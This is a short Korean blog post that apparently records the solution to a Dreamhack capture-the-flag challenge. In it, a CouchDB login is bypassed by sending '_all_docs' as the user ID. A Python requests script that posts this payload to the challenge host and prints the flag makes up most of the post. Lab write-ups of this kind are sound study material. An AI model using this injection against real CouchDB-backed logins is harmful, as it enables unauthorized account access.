Couch DB

buaii·2023년 8월 21일
0

Web Hacking

목록 보기
22/34

NoSQL
Couch DB Injection

NoSQL인 CouchDB를 이용한 문제다

admin계정으로 접속하거나, 아니면 단순히 로그인만 성공해도 되는 문제같다



_all_docs

couch DB에도 informationschema같은 특수 구성요소가 존재한다
_all_docs를 이용하여 로그인을 시도해보자

해당 요소를 사용하면 upwundefined가 된다

즉, upw를 payload에 담지 않으면 된다

import requests

url = "http://host3.dreamhack.games:10124/auth"

data = {'uid':'_all_docs'}

res = requests.post(url, data=data)
print(res.text)

uid_all_docs로 설정해서 보내주면
flag가 출력된다

profile
buaii

0개의 댓글